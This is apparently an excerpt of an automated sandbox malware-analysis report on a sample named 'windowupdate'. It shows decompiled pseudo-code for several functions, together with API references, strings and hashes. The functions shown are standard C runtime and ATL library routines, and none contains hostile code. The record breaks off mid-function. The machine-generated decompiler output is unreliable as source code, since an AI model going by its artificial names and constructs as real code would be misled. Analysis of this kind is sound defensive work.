                      • Opcode Fuzzy Hash: 380ebe3a89da70d78dac604bbb2e92308782a52e2bae83041ce3af96d0a1da34
                      • Instruction Fuzzy Hash: F0315474E00208AFCB04EF64C892BAD7775EF65310F14C09AF9595B286EB31EA41CBB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 95%
                      			E00DB5530(intOrPtr _a4) {
                      				char _v8;
                      				char _v12;
                      				intOrPtr _t27;
                      				void* _t35;
                      				void* _t37;
                      				void* _t40;
                      				intOrPtr _t58;
                      				intOrPtr _t62;
                      				void* _t64;
                      
                      				_t66 = _a4;
                      				if(_a4 == 0) {
                      					_t40 = L00D84930(_t66, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\_getbuf.cpp", 0x12, 0, L"%ls", L"public_stream != nullptr");
                      					_t64 = _t64 + 0x18;
                      					if(_t40 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				E00D66E20( &_v8, _a4);
                      				_t58 =  *0xf21184; // 0x0
                      				 *0xf21184 = _t58 + 1;
                      				_t27 = E00D8C129(E00D4BF60( &_v12, E00D89580(0x1000, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\_getbuf.cpp", 0x1b)));
                      				 *((intOrPtr*)(E00D67320( &_v8) + 4)) = _t27;
                      				E00D4BFA0( &_v12);
                      				if( *((intOrPtr*)(E00D67320( &_v8) + 4)) == 0) {
                      					E00D99080( &_v8, 0x400);
                      					_t62 = E00D67320( &_v8) + 0x14;
                      					__eflags = _t62;
                      					 *((intOrPtr*)(E00D67320( &_v8) + 4)) = _t62;
                      					 *((intOrPtr*)(E00D67320( &_v8) + 0x18)) = 2;
                      				} else {
                      					E00D99080( &_v8, 0x40);
                      					 *((intOrPtr*)(E00D67320( &_v8) + 0x18)) = 0x1000;
                      				}
                      				_t35 = E00D67320( &_v8);
                      				 *((intOrPtr*)(E00D67320( &_v8))) =  *((intOrPtr*)(_t35 + 4));
                      				_t37 = E00D67320( &_v8);
                      				 *((intOrPtr*)(_t37 + 8)) = 0;
                      				return _t37;
                      			}

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00DB5569
                      • __wcstombs_l.LIBCMTD ref: 00DB558B
                      Strings
                      • public_stream != nullptr, xrefs: 00DB553F
                      • minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp, xrefs: 00DB554D
                      • %ls, xrefs: 00DB5544
                      • minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp, xrefs: 00DB557F
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::___wcstombs_lstd::_
                      • String ID: %ls$minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp$minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp$public_stream != nullptr
                      • API String ID: 2681442900-187094882
                      • Opcode ID: e8da5a1a7756b0802c67d5b4dbd26764e205c643d953648688e9d0b87ddd4f23
                      • Instruction ID: dad6c0e9b2db2cb018d6038189baf221758606a15b2c053576292c5e77d4f92c
                      • Opcode Fuzzy Hash: e8da5a1a7756b0802c67d5b4dbd26764e205c643d953648688e9d0b87ddd4f23
                      • Instruction Fuzzy Hash: 45212C31950108EBDB14FB60DD67BEDB764EF50704F544099E9162B292DB705F48EBB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 36%
                      			E00D33C10(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				char _v16;
                      				void* _t22;
                      				void* _t29;
                      				void* _t30;
                      				void* _t31;
                      				void* _t45;
                      				void* _t46;
                      				void* _t47;
                      
                      				_t45 = __esi;
                      				_t44 = __edi;
                      				_t31 = __ebx;
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				E00D34160(_v8 + 4, __edi, __eflags);
                      				_t50 =  *0xf215ec;
                      				if( *0xf215ec != 0) {
                      					_t30 = L00D84930(_t50, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0xbdf, 0, "%ls", L"_pAtlModule == 0");
                      					_t47 = _t47 + 0x18;
                      					_t51 = _t30 - 1;
                      					if(_t30 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				 *((intOrPtr*)(_v8 + 4)) = 0;
                      				 *((intOrPtr*)(_v8 + 0xc)) = 0;
                      				 *((intOrPtr*)(_v8 + 8)) = 0;
                      				 *0xf215ec = _v8;
                      				 *((intOrPtr*)(_v8 + 0x28)) = 0;
                      				_t22 = E00D32900(_v8 + 0x10, _t45, _t51);
                      				_t52 = _t22;
                      				if(_t22 >= 0) {
                      					 *((intOrPtr*)(_v8 + 4)) = 0x24;
                      				} else {
                      					_push("ERROR : Unable to initialize critical section in CAtlModule\n");
                      					_push(0);
                      					_push(E00D3F210(0xf23704));
                      					_push(E00D323B0( &_v16, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0xbe9));
                      					E00D323E0(_t31, _t44, _t45, _t52);
                      					_t47 = _t47 + 0x10;
                      					if(0 == 0) {
                      						_t29 = L00D84930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0xbea, 0, "%ls", 0xde40dc);
                      						_t47 = _t47 + 0x18;
                      						if(_t29 == 1) {
                      							asm("int3");
                      						}
                      					}
                      					 *0xf23675 = 1;
                      				}
                      				return E00DC1520(_v8, _t46 - _t47 + 0xc);
                      			}

                      APIs
                      Strings
                      • ERROR : Unable to initialize critical section in CAtlModule, xrefs: 00D33CA8
                      • _pAtlModule == 0, xrefs: 00D33C42
                      • %ls, xrefs: 00D33C47, 00D33CDE
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D33C53, 00D33CEA
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D33CBF
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Smanip
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$ERROR : Unable to initialize critical section in CAtlModule$_pAtlModule == 0
                      • API String ID: 2140389272-3746135848
                      • Opcode ID: 745bee6eb95ad6af31fe42b366b70fd8444377cb53369bbea9bbd2ddfaacb43d
                      • Instruction ID: c3d77f7e09374062b20ece7407934455de84d0eae88ea0adc19db8c744d228aa
                      • Opcode Fuzzy Hash: 745bee6eb95ad6af31fe42b366b70fd8444377cb53369bbea9bbd2ddfaacb43d
                      • Instruction Fuzzy Hash: 5F21AE74E40208ABDB10FB99DA53B6DB764EB10704F248598E50127382D2B1AB148BB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 38%
                      			E00D35180(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				char _v16;
                      				intOrPtr _t20;
                      				void* _t26;
                      				void* _t28;
                      				void* _t32;
                      				void* _t33;
                      				void* _t41;
                      				void* _t42;
                      				void* _t44;
                      				void* _t45;
                      
                      				_t42 = __esi;
                      				_t41 = __edi;
                      				_t33 = __ebx;
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				do {
                      					_t20 = _a4;
                      					_t47 =  *((intOrPtr*)(_t20 + 0x24));
                      					if( *((intOrPtr*)(_t20 + 0x24)) == 0) {
                      						_t32 = L00D84930(_t47, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlcom.h", 0xe94, 0, "%ls", L"m_pfnCreateInstance != 0");
                      						_t45 = _t45 + 0x18;
                      						if(_t32 == 1) {
                      							asm("int3");
                      						}
                      					}
                      				} while (0 != 0);
                      				_v8 = 0x80004003;
                      				if(_a16 == 0) {
                      					L10:
                      					return E00DC1520(_v8, _t44 - _t45 + 0xc);
                      				}
                      				 *_a16 = 0;
                      				if(_a8 == 0) {
                      					L9:
                      					_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x24))))(_a8, _a12, _a16);
                      					__eflags = _t45 - _t45;
                      					_v8 = E00DC1520(_t26, __eflags);
                      					goto L10;
                      				}
                      				_t28 = E00D33640(_a12, _a12);
                      				_t52 = _t28;
                      				if(_t28 != 0) {
                      					goto L9;
                      				}
                      				_push("CComClassFactory: asked for non IUnknown interface while creating an aggregated object");
                      				_push(0);
                      				_push(E00D3F200(0xf237b8));
                      				_push(E00D323B0( &_v16, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlcom.h", 0xe9d));
                      				E00D323E0(_t33, _t41, _t42, _t52);
                      				_t45 = _t45 + 0x10;
                      				_v8 = 0x80040110;
                      				goto L10;
                      			}
















                      APIs
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcom.h, xrefs: 00D3520F
                      • m_pfnCreateInstance != 0, xrefs: 00D351A5
                      • %ls, xrefs: 00D351AA
                      • CComClassFactory: asked for non IUnknown interface while creating an aggregated object, xrefs: 00D351F8
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcom.h, xrefs: 00D351B6
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Smanip
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcom.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcom.h$CComClassFactory: asked for non IUnknown interface while creating an aggregated object$m_pfnCreateInstance != 0
                      • API String ID: 2140389272-1138684019
                      • Opcode ID: 7f0314f70e703c7e633ccdf80fa6a594e331e97429b241e4cd767f41d4e58ca3
                      • Instruction ID: 2983c201f0a213502f05a91b7e800156415db5e14cc46c40c7d49692d3c076da
                      • Opcode Fuzzy Hash: 7f0314f70e703c7e633ccdf80fa6a594e331e97429b241e4cd767f41d4e58ca3
                      • Instruction Fuzzy Hash: 38218EB5E40319AFDB10EF99ED42FAE77A4EB04740F144458F9086B285D6B49E048BB6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 82%
                      			E00D3DC80(intOrPtr __ecx, void* __esi) {
                      				intOrPtr _v8;
                      				void* _t11;
                      				intOrPtr _t12;
                      				void* _t16;
                      				void* _t18;
                      				void* _t19;
                      				void* _t28;
                      				void* _t29;
                      
                      				_push(__ecx);
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				_t11 = E00DC1520(IsWindow( *(_v8 + 4)), _t29 - _t29);
                      				_t32 = _t11;
                      				if(_t11 == 0) {
                      					_t19 = L00D84930(_t32, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0xfdc, 0, "%ls", L"::IsWindow(this->m_hWnd)");
                      					_t29 = _t29 + 0x18;
                      					if(_t19 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				_t12 = _v8;
                      				_t34 =  *(_t12 + 0x20) & 0x000000ff;
                      				if(( *(_t12 + 0x20) & 0x000000ff) != 0) {
                      					_t18 = L00D84930(_t34, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0xfde, 0, "%ls", L"!m_bModal");
                      					_t29 = _t29 + 0x18;
                      					if(_t18 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(E00DC1520(DestroyWindow( *(_v8 + 4)), _t29 - _t29) != 0) {
                      					_t16 = 1;
                      				} else {
                      					_t16 = 0;
                      				}
                      				return E00DC1520(_t16, _t28 - _t29 + 4);
                      			}












                      APIs
                      • IsWindow.USER32(?), ref: 00D3DC98
                      • DestroyWindow.USER32(?,?,?,?,00D3C6A1,71E60372,?,?,00DC4F30,000000FF), ref: 00D3DD09
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Window$Destroy
                      • String ID: !m_bModal$%ls$::IsWindow(this->m_hWnd)$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h
                      • API String ID: 3707531092-711770546
                      • Opcode ID: 1e25f523019e2f7e78370ad49e093ac2361a2bddd867bf7bf4ce4278414bb3eb
                      • Instruction ID: e4f8503104a005acc264c1a3f645dc0aeab4b3cd613edc22c94cc73ebc873191
                      • Opcode Fuzzy Hash: 1e25f523019e2f7e78370ad49e093ac2361a2bddd867bf7bf4ce4278414bb3eb
                      • Instruction Fuzzy Hash: 94110435E503166FC720B759BD43F6E77658B04B40F1401A8FA09AB683E1A0EE004AB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D36D70(void* __esi) {
                      				intOrPtr _t21;
                      				intOrPtr _t22;
                      				void* _t25;
                      				void* _t26;
                      
                      				_t21 =  *0xf215b4; // 0x80000001
                      				if(_t21 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
                      					E00D47480(0xf215b4);
                      					_t26 = _t26 + 4;
                      					if( *0xf215b4 == 0xffffffff) {
                      						E00D36720(0xf215b8, E00DC1520(GetProcessHeap(), _t26 - _t26));
                      						E00D48270(0xf215b8, 0xdc57c0);
                      						E00D47430(0xf215b4);
                      						_t26 = _t26 + 8;
                      					}
                      				}
                      				_t22 =  *0xf2159c; // 0x80000002
                      				if(_t22 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
                      					E00D47480(0xf2159c);
                      					_t26 = _t26 + 4;
                      					_t33 =  *0xf2159c - 0xffffffff;
                      					if( *0xf2159c == 0xffffffff) {
                      						E00D36D00(0xf2369c, _t33, 0xf215b8);
                      						E00D48270(0xf2369c, 0xdc57a0);
                      						E00D47430(0xf2159c);
                      						_t26 = _t26 + 8;
                      					}
                      				}
                      				return E00DC1520(0xf2369c, _t25 - _t26);
                      			}








                      APIs
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Init_thread_footerInit_thread_header_atexit$HeapProcess
                      • String ID:
                      • API String ID: 3065931843-0
                      • Opcode ID: 02f6a09d652fad34e61bc4315cfb36594b9c888e962554b1d5f5b4c4d285a03c
                      • Instruction ID: a355eb618e837590259ac2b67e96e84de8ef2aca49e3625e74445e4c396edae0
                      • Opcode Fuzzy Hash: 02f6a09d652fad34e61bc4315cfb36594b9c888e962554b1d5f5b4c4d285a03c
                      • Instruction Fuzzy Hash: 2A0108F9A00624EBC530B754B853E6D3212EBA8718F484274F40B17297D721E901AAFB
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D34020(void* __esi, CHAR* _a4, CHAR* _a8) {
                      				char _v5;
                      				char _v6;
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr _t39;
                      				void* _t75;
                      				void* _t76;
                      
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v5 = E00DC1520(CharUpperA( *_a4 & 0x000000ff), _t76 - _t76);
                      				_v6 = E00DC1520(CharUpperA( *_a8 & 0x000000ff), _t76 - _t76);
                      				while(_v5 != 0 && _v5 == _v6 && _v5 != 0x20 && _v5 != 9) {
                      					_a4 = E00DC1520(CharNextA(_a4), _t76 - _t76);
                      					_a8 = E00DC1520(CharNextA(_a8), _t76 - _t76);
                      					_v5 = E00DC1520(CharUpperA( *_a4 & 0x000000ff), _t76 - _t76);
                      					_v6 = E00DC1520(CharUpperA( *_a8 & 0x000000ff), _t76 - _t76);
                      				}
                      				__eflags = _v5;
                      				if(_v5 == 0) {
                      					L9:
                      					__eflags = _v6;
                      					if(_v6 == 0) {
                      						L12:
                      						_t39 = 0;
                      					} else {
                      						__eflags = _v6 - 0x20;
                      						if(_v6 == 0x20) {
                      							goto L12;
                      						} else {
                      							__eflags = _v6 - 9;
                      							if(_v6 != 9) {
                      								goto L13;
                      							} else {
                      								goto L12;
                      							}
                      						}
                      					}
                      				} else {
                      					__eflags = _v5 - 0x20;
                      					if(_v5 == 0x20) {
                      						goto L9;
                      					} else {
                      						__eflags = _v5 - 9;
                      						if(_v5 != 9) {
                      							L13:
                      							__eflags = _v5 - _v6;
                      							if(_v5 >= _v6) {
                      								_v12 = 1;
                      							} else {
                      								_v12 = 0xffffffff;
                      							}
                      							_t39 = _v12;
                      						} else {
                      							goto L9;
                      						}
                      					}
                      				}
                      				__eflags = _t75 - _t76 + 8;
                      				return E00DC1520(_t39, _t75 - _t76 + 8);
                      			}











                      APIs
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Char$Upper$Next
                      • String ID:
                      • API String ID: 3006421506-0
                      • Opcode ID: b005a01d8e90fdcf01b540222652dc96effae5c1d95f475644afade012a59217
                      • Instruction ID: 6ee4133f56dc8d77ec922b8e0ee443634926a91389c8d4e066cbf0895623f932
                      • Opcode Fuzzy Hash: b005a01d8e90fdcf01b540222652dc96effae5c1d95f475644afade012a59217
                      • Instruction Fuzzy Hash: 30312831D0C6E56ACF119BB884D15BEBF759E13212F0841C9E8A2A7242D23DDF80CBB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 75%
                      			E00D52860(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                      				signed int _v5;
                      				intOrPtr _v12;
                      				char _v20;
                      				char _v28;
                      				char _v36;
                      				char* _t19;
                      				intOrPtr _t20;
                      				intOrPtr* _t27;
                      				intOrPtr _t29;
                      				intOrPtr _t32;
                      				char* _t46;
                      				char* _t47;
                      				void* _t57;
                      				void* _t58;
                      
                      				_t56 = __esi;
                      				_t55 = __edi;
                      				_t38 = __ebx;
                      				_t19 =  *0xf20640; // 0x0
                      				if( *_t19 != 0) {
                      					_t20 = E00D58D00(__ebx, __edi, __esi,  &_v28);
                      					_t58 = _t57 + 4;
                      					_v12 = _t20;
                      					E00D4FBB0(_v12,  &_v20, 0x7b);
                      					_v5 = 0;
                      					while(1 != 0) {
                      						if((_v5 & 0x000000ff) != 0) {
                      							E00D4FDE0( &_v20, 0x2c);
                      						}
                      						_t27 = E00D586C0(_t38, _t55, _t56,  &_v36);
                      						_t58 = _t58 + 4;
                      						E00D4FD40( &_v20, _t27);
                      						_t46 =  *0xf20640; // 0x0
                      						if( *_t46 == 0x40) {
                      							_t29 =  *0xf20640; // 0x0
                      							 *0xf20640 = _t29 + 1;
                      							_t47 =  *0xf20640; // 0x0
                      							if( *_t47 != 0x40) {
                      								_v5 = 1;
                      								continue;
                      							}
                      							_t32 =  *0xf20640; // 0x0
                      							 *0xf20640 = _t32 + 1;
                      							break;
                      						} else {
                      							E00D4F350(_a4, 2);
                      							return _a4;
                      						}
                      					}
                      					E00D4FDE0( &_v20, 0x7d);
                      					E00D4F240(_a4,  &_v20);
                      					return _a4;
                      				}
                      				E00D4F350(_a4, 1);
                      				return _a4;
                      			}


















                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00D52877
                        • Part of subcall function 00D4F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 00D4F3AE
                      • DName::operator+.LIBCMTD ref: 00D5289C
                      • DName::operator+=.LIBCMTD ref: 00D528BB
                      • DName::DName.LIBVCRUNTIMED ref: 00D528E8
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Name$Name::$Name::operator+Name::operator+=Node::makeStatus
                      • String ID:
                      • API String ID: 2485589204-0
                      • Opcode ID: 11bab6faa2c96c6e9f0352213584639cd7feaef8002e6c41390f81b8c09b1672
                      • Instruction ID: c680ec47d77939dbc28d2ba7518c5566c3ed3b382c04ff833238bcb8889887c8
                      • Opcode Fuzzy Hash: 11bab6faa2c96c6e9f0352213584639cd7feaef8002e6c41390f81b8c09b1672
                      • Instruction Fuzzy Hash: F721D371A041189BEF14DF50D891BBE3B70FF82305F084068EC465B2A2DB31AA49DFB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D59B40(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                      				intOrPtr _v8;
                      				char _v16;
                      				char _v24;
                      				char _v32;
                      				char _v40;
                      				char* _t18;
                      				char* _t39;
                      				intOrPtr _t42;
                      				char* _t52;
                      
                      				_t18 =  *0xf20640; // 0x0
                      				if( *_t18 != 0) {
                      					_v8 = E00D58D00(__ebx, __edi, __esi,  &_v24);
                      					E00D4FBB0(_v8,  &_v16, 0x7b);
                      					_t39 =  *0xf20640; // 0x0
                      					if( *_t39 != 0x40) {
                      						E00D4FD40( &_v16, E00D5A1E0(__ebx, __edi, __esi,  &_v32, 0, 0));
                      						E00D4FDE0( &_v16, 0x3a);
                      						E00D4FD40( &_v16, E00D586C0(__ebx, __edi, __esi,  &_v40));
                      					}
                      					E00D4FDE0( &_v16, 0x7d);
                      					_t52 =  *0xf20640; // 0x0
                      					if( *_t52 != 0x40) {
                      						E00D4F350(_a4, 2);
                      						return _a4;
                      					} else {
                      						_t42 =  *0xf20640; // 0x0
                      						 *0xf20640 = _t42 + 1;
                      						E00D4F240(_a4,  &_v16);
                      						return _a4;
                      					}
                      				}
                      				E00D4F350(_a4, 1);
                      				return _a4;
                      			}













                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00D59B57
                        • Part of subcall function 00D4F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 00D4F3AE
                      • DName::operator+.LIBCMTD ref: 00D59B7C
                      • DName::operator+=.LIBCMTD ref: 00D59BAD
                      • DName::operator+=.LIBCMTD ref: 00D59BCC
                      • Mailbox.LIBCMTD ref: 00D59BF5
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: NameName::operator+=$MailboxName::Name::operator+Node::makeStatus
                      • String ID:
                      • API String ID: 3234464337-0
                      • Opcode ID: 8b0350f7138cae17da442a45a800c9423af66cb24535ab25f91f7e1412f32f42
                      • Instruction ID: 23fcebd27ef0eccb343330f81a8f53c272fab4cd51a7aaf8282b98b8370237e0
                      • Opcode Fuzzy Hash: 8b0350f7138cae17da442a45a800c9423af66cb24535ab25f91f7e1412f32f42
                      • Instruction Fuzzy Hash: 26214271D00108ABDB14EF50D892EAE7B75EB40345F144169FD166B1A2DF71BE05CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 98%
                      			E00DA5490(void* __ecx, intOrPtr _a4) {
                      				signed int _v8;
                      				void* _t108;
                      				intOrPtr _t124;
                      				void* _t141;
                      				signed int _t181;
                      				void* _t199;
                      				void* _t200;
                      
                      				_t101 = _a4;
                      				if( *((intOrPtr*)(_a4 + 0x88)) == 0 ||  *((intOrPtr*)(_a4 + 0x88)) == 0xdf6770 ||  *((intOrPtr*)(_a4 + 0x7c)) == 0) {
                      					L11:
                      					if( *((intOrPtr*)(_a4 + 0x8c)) != 0) {
                      						_t32 = _a4 + 0x8c; // 0x4d8bffff
                      						_t218 =  *((intOrPtr*)( *_t32));
                      						if( *((intOrPtr*)( *_t32)) == 0) {
                      							_t34 = _a4 + 0x90; // 0x84e851fc
                      							L00D89480(_t218,  *_t34 - 0xfe, 2);
                      							_t36 = _a4 + 0x94; // 0x8bfffffb
                      							L00D89480(_t218,  *_t36 - 0x80, 2);
                      							_t38 = _a4 + 0x98; // 0x8bc35de5
                      							L00D89480( *_t38 - 0x80,  *_t38 - 0x80, 2);
                      							_t40 = _a4 + 0x8c; // 0x4d8bffff
                      							_t101 = L00D89480( *_t38 - 0x80,  *_t40, 2);
                      							_t199 = _t199 + 0x20;
                      						}
                      					}
                      					_t42 = _a4 + 0x9c; // 0xec8b55ff
                      					E00DA5790(_t101,  *_t42);
                      					_t200 = _t199 + 4;
                      					_v8 = 0;
                      					while(_v8 <= 5) {
                      						if( *((intOrPtr*)(_a4 + (_v8 << 4) + 0x20)) != 0xdf61e8 &&  *((intOrPtr*)(_a4 + (_v8 << 4) + 0x28)) != 0) {
                      							_t58 = (_v8 << 4) + 0x28; // 0x8bcccccc
                      							if( *((intOrPtr*)( *((intOrPtr*)(_a4 + _t58)))) == 0) {
                      								_t62 = (_v8 << 4) + 0x28; // 0x8bcccccc
                      								L00D89480(_v8 << 4,  *((intOrPtr*)(_a4 + _t62)), 2);
                      								_t66 = _v8 * 4; // 0xfe45e851
                      								L00D89480(_v8 << 4,  *((intOrPtr*)(_a4 + _t66 + 0xa0)), 2);
                      								_t200 = _t200 + 0x10;
                      							}
                      						}
                      						if( *((intOrPtr*)(_a4 + (_v8 << 4) + 0x1c)) == 0 ||  *((intOrPtr*)(_a4 + (_v8 << 4) + 0x24)) == 0) {
                      							if( *((intOrPtr*)(_a4 + (_v8 << 4) + 0x1c)) != 0) {
                      								L25:
                      								_t108 = L00D84930(_t228, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\locale\\locale_refcounting.cpp", 0xaf, 0, L"%ls", L"(ptloci->lc_category[category].locale != nullptr && ptloci->lc_category[category].refcount != nullptr) || (ptloci->lc_category[category].locale == nullptr && ptloci->lc_category[category].refcount == nullptr)");
                      								_t200 = _t200 + 0x18;
                      								if(_t108 == 1) {
                      									asm("int3");
                      								}
                      								goto L27;
                      							}
                      							_t181 = _v8 << 4;
                      							_t124 = _a4;
                      							_t228 =  *((intOrPtr*)(_t124 + _t181 + 0x24));
                      							if( *((intOrPtr*)(_t124 + _t181 + 0x24)) == 0) {
                      								goto L27;
                      							}
                      							goto L25;
                      						} else {
                      							L27:
